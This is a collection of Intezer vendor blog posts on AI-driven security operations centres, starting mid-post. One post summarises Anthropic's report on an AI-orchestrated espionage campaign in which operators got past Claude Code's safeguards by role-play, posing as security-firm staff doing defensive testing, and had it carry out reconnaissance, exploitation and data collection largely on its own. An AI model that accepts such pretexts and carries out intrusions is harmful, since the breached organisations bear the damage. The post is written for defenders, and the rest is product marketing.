  2. Verdict accuracy – The supermajority of decisions must be right, consistently and explainably.
  3. Escalation rate – Only the rarest cases should reach human review.
  4. Explainability – Every verdict is clearly backed by evidence: memory scans, forensic traces, and contextual reasoning.
  5. Feedback velocity – Every corrected verdict feeds back into the detection logic, closing the learning loop.

When you measure what truly matters, accuracy, coverage, trust, the difference between AI that “helps” and AI that defends becomes obvious.

Why “AI SOC Agent” ≠ “AI SOC Platform”

The reports conflate two very different things. An “AI SOC agent” is a single use case, an assistant. An “AI SOC platform” is a full operating model: triage, investigation, and response fused into a continuous feedback loop back to detection engineering. One optimizes efficiency; the other drives security transformation.

That’s the real inflection point the industry is standing at. SOCs that treat AI as a productivity booster will get marginal gains, which is a great thing for the industry. SOCs that rebuild around AI as a core operating principle will experience exponential gains with real risk reduction.

In other words: this isn’t about speeding up analysts, it’s about scaling their expertise across the entire alert surface.

From AI promise to proof

The challenge now isn’t technology, it’s perception. The AI SOC has already proven it can outperform legacy models built on manual triage and brittle playbooks. It has shown that full alert coverage, explainable verdicts, and continuous learning can coexist with human oversight and compliance.

The industry doesn’t need another year of pilots to “validate the promise.” It needs a new standard of performance.

The next evolution of the SOC will be measured not by how well it augments workflows, but by how confidently it can:

  • Detect and triage every signal.
  • Deliver verdicts with explainable evidence.
  • Quantify accuracy in measurable, repeatable terms.
  • Strengthen analyst trust through transparency.

That’s the AI SOC outcome model, here today.

Final thoughts

Gartner’s perspective is valuable for shaping the taxonomy of an emerging market. But the reality on the ground has already overtaken the research. The world doesn’t need another whitepaper on “potential.” It needs proof of performance, and it exists.

The future SOC isn’t augmented.

It’s autonomous, accurate, and accountable for strategic security outcomes that CISOs and leaders require, either now or in the next few months with the executive leadership push to operationalize AI.

The world’s largest enterprises today already benefit from the real market-defining traits of a forensic AI SOC.

To learn more about Intezer’s Forensic AI SOC platform, schedule a demo today!

The post Why the “AI SOC Agent” narrative misses the point: The future is about security outcomes, not workflow augmentation appeared first on Intezer.

  •  

What the Anthropic report on AI espionage means for security leaders

1. Introduction: The Benchmark, Not the Hype

For a while now, the security community has been aware that threat actors are using AI. We’ve seen evidence of it for everything from generating phishing content to optimizing malware. The recent report from Anthropic on an “AI-orchestrated cyber espionage campaign”, however, marks a significant milestone.

This is the first time we have a public, detailed report of a campaign where AI was used at this scale and with this level of sophistication, moving the threat from a collection of AI-assisted tasks to a largely autonomous, orchestrated operation.

This report is a significant new benchmark for our industry. It’s not a reason to panic – it’s a reason to prepare. It provides the first detailed case study of a state-sponsored attack with three critical distinctions:

  • It was “agentic”: This wasn’t just an attacker using AI for help. This was an AI system executing 80-90% of the attack largely on its own.
  • It targeted high-value entities: The campaign was aimed at approximately 30 major technology corporations, financial institutions, and government agencies.
  • It had successful intrusions: Anthropic confirmed the campaign resulted in “a handful of successful intrusions” and obtained access to “confirmed high-value targets for intelligence collection”.

Together, these distinctions show why this case matters. A high-level, autonomous, and successful AI-driven attack is no longer a future theory. It is a documented, current-day reality.

2. What Actually Happened: A Summary of the Attack

For those who haven’t read the full report (or the summary blog post), here are the key facts.

The attack (designated GTG-1002) was a “highly sophisticated cyber espionage operation” detected in mid-September 2025.

  • AI Autonomy: The attacker used Anthropic’s Claude Code as an autonomous agent, which independently executed 80-90% of all tactical work.
  • Human Role: Human operators acted as “strategic supervisors”. They set the initial targets and authorized critical decisions, like escalating to active exploitation or approving final data exfiltration.
  • Bypassing Safeguards: The operators bypassed AI safety controls using simple “social engineering”. The report notes, “The key was role-play: the human operators claimed that they were employees of legitimate cybersecurity firms and convinced Claude that it was being used in defensive cybersecurity testing”.
  • Full Lifecycle: The AI autonomously executed the entire attack chain: reconnaissance, vulnerability discovery, exploitation, lateral movement, credential harvesting, and data collection.
  • Timeline: After detecting the activity, Anthropic’s team launched an investigation, banned the accounts, and notified partners and affected entities over the “following ten days”.

Source: https://www.anthropic.com/news/disrupting-AI-espionage

3. What Was Not New (And Why It Matters)

To have a credible discussion, we must also look at what wasn’t new. This attack wasn’t about secret, magical weapons.

The report is clear that the attack’s sophistication came from orchestration, not novelty.

  • No Zero-Days: The report does not mention the use of novel zero-day exploits.
  • Commodity Tools: The report states, “The operational infrastructure relied overwhelmingly on open source penetration testing tools rather than custom malware development”.

This matters because defenders often look for new exploit types or malware indicators. But the shift here is operational, not technical. The attackers didn’t invent a new weapon, they built a far more effective way to use the ones we already know.

4. The New Reality: Why This Is an Evolving Threat

So, if the tools aren’t new, what is? The execution model. And we must assume this new model is here to stay.

This new attack method is a natural evolution of technology. We should not expect it to be “stopped” at the source for two main reasons:

  1. Commercial Safeguards are Limited: AI vendors like Anthropic are building strong safety controls – it’s how this was detected in the first place. But as the report notes, malicious actors are continually trying to find ways around them. No vendor can be expected to block 100% of all malicious activity.
  2. The Open-Source Factor: This is the larger trend. Attackers don’t need to use a commercial, monitored service. With powerful open-source AI models and orchestration frameworks – such as LLaMA, self-hosted inference stacks, and LangChain/LangGraph agents – attackers can build private AI systems on their own infrastructure. This leaves no vendor in the middle to monitor or prevent the abuse.

The attack surface is not necessarily growing, but the attacker’s execution engine is accelerating.

5. Detection: Key Patterns to Hunt For

While the techniques were familiar, their execution creates a different kind of detection challenge. An AI-driven attack doesn’t generate one “smoking gun” alert, like a unique malware hash or a known-bad IP. Instead, it generates a storm of low-fidelity signals. The key is to hunt for the patterns within this noise:

  • Anomalous Request Volumes: The AI operated at “physically impossible request rates” with “peak activity included thousands of requests, representing sustained request rates of multiple operations per second”. This is a classic low-fidelity, high-volume signal that is often just seen as noise.
  • Commodity and Open-Source Penetration Testing Tools: The attack utilized a combination of “standard security utilities” and “open source penetration testing tools”.
  • Traffic from Browser Automation: The report explicitly calls out “Browser automation for web application reconnaissance” to “systematically catalog target infrastructure” and “analyze authentication mechanisms”.
  • Automated Stolen Credential Testing: The AI didn’t just test one password, it “systematically tested authentication against internal APIs, database systems, container registries, and logging infrastructure”. This automated, broad, and rapid testing looks very different from a human’s manual attempts.
  • Audit for Unauthorized Account Creation: This is a critical, high-confidence post-exploitation signal. In one successful compromise, the AI’s autonomous actions included the creation of a “persistent backdoor user”.

6. The Defender’s Challenge: A Flood of Low-Fidelity Noise

The detection patterns listed above create the central challenge of defending against AI-orchestrated attacks. The problem isn’t just alert volume, it’s that these attacks generate a massive volume of low-fidelity alerts.

This new execution model creates critical blind spots:

  1. The Volume Blind Spot: The AI’s automated nature creates a flood of low-confidence alerts. No human-only SOC can manually triage this volume.
  2. The Temporal (Speed) Blind Spot: A human-led intrusion might take days or weeks. Here, the AI compressed a full database extraction – from authentication to data parsing – into just 2-6 hours. Our human-based detection and response loops are often too slow to keep up.
  3. The Context Blind Spot: The AI’s real power is connecting many small, seemingly unrelated signals (a scan, a login failure, a data query) into a single, coherent attack chain. A human analyst, looking at these alerts one by one, would likely miss the larger pattern.

7. The Importance of Autonomous Triage and Investigation

When the attack is autonomous, the defense must also have autonomous capabilities.

We cannot hire our way out of this speed and scale problem. The security operations model must shift. The goal of autonomous triage is not just to add context, but to handle the entire investigation process for every single alert, especially the thousands of low-severity signals that AI-driven attacks create.

An autonomous system can automatically investigate these signals at machine speed, determine which ones are irrelevant noise, and suppress them.

This is the true value: the system escalates only the high-confidence, confirmed incidents that actually matter. This frees your human analysts from chasing noise and allows them to focus on real, complex threats.

This is exactly the type of challenge autonomous triage systems like the one we’ve built at Intezer were designed to solve. As Anthropic’s own report concludes, “Security teams should experiment with applying AI for defense in areas like SOC automation, threat detection… and incident response“.

8. Evolving Your Offensive Security Program

To defend against this threat, we must be able to test our defenses against it. All offensive security activities, internal red teams, external penetration tests, and attack simulations, must evolve.

It is no longer enough for offensive security teams to manually simulate attacks. To truly test your defenses, your red teams or external pentesters must adopt agentic AI frameworks themselves.

The new mandate is to simulate the speed, scale, and orchestration of an AI-driven attack, similar to the one detailed in the Anthropic report. Only then can you validate whether your defensive systems and automated processes can withstand this new class of automated onslaught. Naturally, all such simulations must be done safely and ethically to prevent any real-world risk.

9. Conclusion: When the Threat Model Changes, Our Processes Must, Too.

The Anthropic report doesn’t introduce a new magic exploit. It introduces a new execution model that we now need to design our defenses around.

Let’s summarize the key, practical takeaways:

  • AI-orchestrated attacks are a proven, documented reality.
  • The primary threat is speed and scale, which is designed to overwhelm manual security processes.
  • Security leaders must prioritize automating investigation and triage to suppress the noise and escalate what matters.
  • We must evolve offensive security testing to simulate this new class of autonomous threat.

This report is a clear signal. The threat model has officially changed. Your security architecture, processes, and playbooks must change with it. The same applies if you rely on an MSSP, verify they’re evolving their detection and triage capabilities for this new model. This shift isn’t hype, it’s a practical change in execution speed. With the right adjustments and automation, defenders can meet this challenge.

To learn more, you can read the Anthropic blog post here and the full technical report here.

The post What the Anthropic report on AI espionage means for security leaders appeared first on Intezer.

  •  

Properly framing the AI SOC conversation 

Gartner’s recent Innovation Insight: AI SOC Agents report is an encouraging signal that the concept of an “AI-powered SOC” has reached mainstream awareness. The report recognizes the potential of AI technologies to transform how security operations centers function, especially in augmenting analysts through automation and intelligent workflows.

Yet, while Gartner’s analysis succeeds in capturing the momentum of this space, it falls short in clarifying how and where AI actually fits within the security operations stack. By treating “AI SOC” as a monolithic, undifferentiated category, the report overlooks the crucial distinctions between detection, triage and response, each of which requires a very different kind of AI capability and delivers very different value.

A closer look at Gartner’s analysis 

Gartner’s report provides a valuable overview of how AI SOC can assist with detection, alert investigation, and even response recommendation. We wholeheartedly agree with Gartner’s advice that CISOs should evaluate which security activities are “volumetric, troublesome, or low-performing, and which would benefit the most from augmentation with the application of AI”. However, presenting all of the AI SOC functions (and vendors) as part of a single undifferentiated security ecosystem, can be confusing. 

This broad framing misses the fact that an AI model designed to improve SIEM detection logic operates on entirely different data, architecture, and feedback loops than one built to support analyst decision-making or response automation. The result is a flattening of a nuanced market into one monolithic category, useful for taxonomy, but not for decision-making.

For CISOs, this lack of segmentation makes it hard to answer the key strategic question: Where should we apply AI first to get tangible operational value?

By contrast, our view is that organizations should start by identifying which part of their operations needs augmentation most, then evaluate AI solutions purpose-built for that domain.

A clearer way to frame the AI SOC market

To understand where AI truly fits in and how it can deliver measurable outcomes, it helps to zoom out and look at the broader security operations stack. As we described in a previous blog post, “Making sense of the AI SOC market”, we see three main layers where AI can add value:

Detection (SIEM, XDR)

The first layer converts raw telemetry into actionable alerts. Here, AI can strengthen correlation logic, improve detection models, and reduce false positives. This is largely about data pattern recognition and automation of repetitive analysis.

Triage and Investigation (SOC / MDR)

The middle layer is where human analysts determine which alerts are real incidents worth escalating. This is where AI can truly emulate analyst reasoning, gathering context, cross-referencing intelligence, and presenting likely root causes. Done well, AI here acts as a co-analyst, not a replacement.

Response and Case Management (SOAR)

The final layer coordinates remediation and manages incident workflows. AI can accelerate playbook creation, automate routine case handling, and improve overall response time through dynamic decision logic.

Each layer offers opportunities for AI—but they are fundamentally different problems to solve. When vendors use the term “AI SOC” without specifying which layer they’re addressing, it creates confusion and unrealistic expectations.

A more practical evaluation framework

To move the conversation forward, we recommend a more structured approach to evaluating AI SOC solutions.

Step 1: Identify your target layer

Ask: Which layer of our operations needs the most improvement. Is it detection (SIEM/XDR/Cloud), triage (SOC/MDR), or response (SOAR)? 

This helps narrow the field to the right class of solutions rather than chasing the broad “AI SOC” label.

Step 2: Define measurable outcomes

Especially for alert triage and investigation (which is usually handled by an internal SOC or external MDR), establish metrics to compare performance, such as:

  • Reduction in mean time to detect (MTTD)
  • Noise reduction rate
  • Scale of alert coverage
  • Consistency across SOC shifts or analyst tiers
  • Triage accuracy

These metrics allow organizations to compare vendors on tangible outcomes, not vague AI promises.

Step 3: Evaluate transparency and integration

An effective AI SOC solution should clearly explain its reasoning, integrate easily with your existing tools, and allow human oversight. The goal is augmentation, not opacity.

Read more about why the “AI SOC agent” narrative misses the point.

The way forward

Gartner deserves credit for bringing visibility to an emerging market, but their analysis underscores how early and fluid this space still is. The future of the AI SOC isn’t one product category. It’s a set of AI capabilities applied intelligently across the detection–triage–response continuum.

Organizations that treat AI as a modular capability rather than a monolithic product will see the most success. The key is knowing your operational priorities and matching them to the layer where AI can have the greatest impact.

Conclusion

AI is not a magic “SOC-in-a-box.” It’s a set of technologies that, when properly targeted, can transform specific parts of security operations. Gartner’s latest report captures the enthusiasm, but not yet the structure, of this market.

At Intezer, we believe the path forward starts with clarity. Understanding the distinct layers of the SOC, the role AI plays in each, and the outcomes that matter most. Only then can organizations cut through the noise and choose the right AI SOC partner for their needs.

Explore how Intezer delivers complete peace of mind for your security operations! 

The post Properly framing the AI SOC conversation  appeared first on Intezer.

  •  

Making sense of the AI SOC market

There’s been an explosion of buzz around the AI SOC market. More than 40 vendors are now claiming to do something in this space, but as with many emerging technology categories, the result is a lot of excitement and a lot of confusion.

In this video and in the article below it, I want to provide some clarity. What exactly is “AI SOC”? Where did this category come from? And how can security teams cut through the noise to find real value?

The origins of the AI SOC: An old problem meets new tech

The rise of the AI SOC stems from two converging forces. A very old problem and a very new technology.

The old problem is the persistent talent shortage in cybersecurity combined with the overwhelming volume of security alerts. Security teams have been drowning in these alerts for years, struggling to keep up with investigation and response.

The new technology is AI, especially large language models (LLMs) and adjacent innovations, which open up an opportunity to finally address that shortage by automating some of the human decision-making process.

The 3 layers of security operations

To understand where AI fits in and how it can help, let’s zoom out and look at the broader security operations stack. 

There are three main layers:

Detection (SIEM, XDR) is the first level which handles converting raw logs and other telemetry data into actionable alerts.

Triage and investigation (SOC) is the middle layer where human analysts determine which alerts are real incidents worth escalating.

Response and case management (SOAR) is the final layer that manages incident remediation with case assignment, and workflow automation.

Each layer presents opportunities for AI. For example, in SIEM/XDR, AI can improve detection logic and reduce false positives. For SOC, AI can simulate the investigative reasoning of human analysts. And when applied to SOAR, AI can accelerate workflow creation and automate routine case handling.

In each of these areas, vendors are loosely using the term AI SOC to describe what they are doing. And that is why it’s important to know what problem you are trying to solve and which ‘AI SOC” solution is appropriate for you.

Read about how AI is redefining detection engineering.

What AI SOC usually means

All that said, when people refer to AI SOC, they’re usually talking about that middle layer. The part focused on automated alert triage, investigation, and escalation.

That’s where Intezer focuses: providing 24/7 managed alert triage, investigation, and response powered by a decade of deep forensic analysis tooling combined with flexible and adaptable LLMs.

Our system automatically investigates alerts, surfaces only what truly requires attention, and escalates only up to 4% of alerts to human analysts.

This is where the market’s energy, and customer need, are currently concentrated. Teams want to scale their response capabilities without adding headcount, and AI SOCs make that possible.

How to evaluate AI SOC vendors

With so many vendors entering the field, it’s important to evaluate them based on clear, measurable criteria. Some of the key metrics that I’m hearing from our customers and prospect that they consider, include:

  • Accuracy: How precise are the AI-driven investigations?
  • Speed: How quickly can alerts be triaged?
  • Scale and coverage: Can the system handle all your alerts in a timely fashion?
  • Noise reduction: What percentage of alerts still require human review?
  • Context and transparency: Can you understand how the AI reached its conclusions, or is it a black box?

For more on this, see our guide to evaluate AI SOC tools (with questions to ask vendors).

The road ahead

AI SOC is one of the most exciting and fast-evolving categories in cybersecurity. It’s also one of the messiest, but that’s often a sign of real innovation happening.

For years, the industry has been searching for a way to truly solve the alert overload and talent shortage problem. With the arrival of AI-driven investigation technology, we’re finally seeing that vision come to life.

A recent SACR market analysis report examined these metrics across leading AI SOC vendors which can be very helpful for evaluating which solution is right for you. And I definitely recommend reading about Intezer in the report 🙂. 

At Intezer, we’re proud to help security teams reduce noise, focus on real threats, and scale their operations intelligently.

If you’re exploring this space, we’d love to be your partner in building a smarter SOC.

The post Making sense of the AI SOC market appeared first on Intezer.

  •  
❌